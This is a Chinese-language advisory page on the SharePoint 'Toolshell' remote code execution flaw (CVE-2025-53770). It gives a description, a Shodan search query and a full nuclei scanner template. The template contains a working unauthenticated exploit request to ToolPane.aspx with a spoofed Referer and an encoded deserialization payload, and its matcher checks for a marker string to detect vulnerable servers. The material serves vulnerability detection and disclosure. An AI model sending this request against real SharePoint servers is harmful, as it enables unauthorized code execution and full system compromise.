Microsoft SharePoint Remote Code Execution Toolshell Vulnerability

漏洞信息

漏洞名称： Microsoft SharePoint Remote Code Execution “Toolshell” Vulnerability

漏洞编号：

• CVE： CVE-2025-53770

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： 该漏洞影响的是Microsoft SharePoint Server，一个广泛使用的企业级协作平台，用于文档管理和团队协作。SharePoint Server通常部署在企业内部网络中，支持多种业务功能，包括内容管理、业务智能和搜索等。由于其广泛的应用，该漏洞的影响范围较大。

漏洞类型为反序列化漏洞，技术根源在于SharePoint Server在处理特定请求时，未能正确验证和过滤用户提供的数据，导致攻击者可以通过构造恶意的序列化数据，在服务器上执行任意代码。这种漏洞通常由于应用程序在处理对象序列化和反序列化时，缺乏足够的安全检查和控制。

该漏洞的安全风险极高，攻击者可以在无需任何身份验证的情况下，通过网络远程执行代码，完全控制系统。这意味着攻击者可以窃取敏感数据、安装恶意软件或利用受感染的服务器作为跳板，进一步攻击内部网络。由于漏洞已被发现在野外被利用，且微软正在准备补丁，所有使用受影响版本的SharePoint Server的组织应立即采取缓解措施，以防止潜在的攻击。

产品厂商： Microsoft

产品名称： SharePoint Server

搜索语法： http.component:”Sharepoint”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/da5508be051261ee62fffa3f167f2819bf5a3180/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability.In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  reference:
    - https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Sharepoint"
  tags: cve,cve2025,kev,sharepoint,rce

http:
  - raw:
    - |
      POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
      Host: {{Host}}
      Referer: /_layouts/SignOut.aspx
      Content-Type: application/x-www-form-urlencoded

      MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'CompressedDataTable="(.*?)"'
        name: encoded_response
        internal: true

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")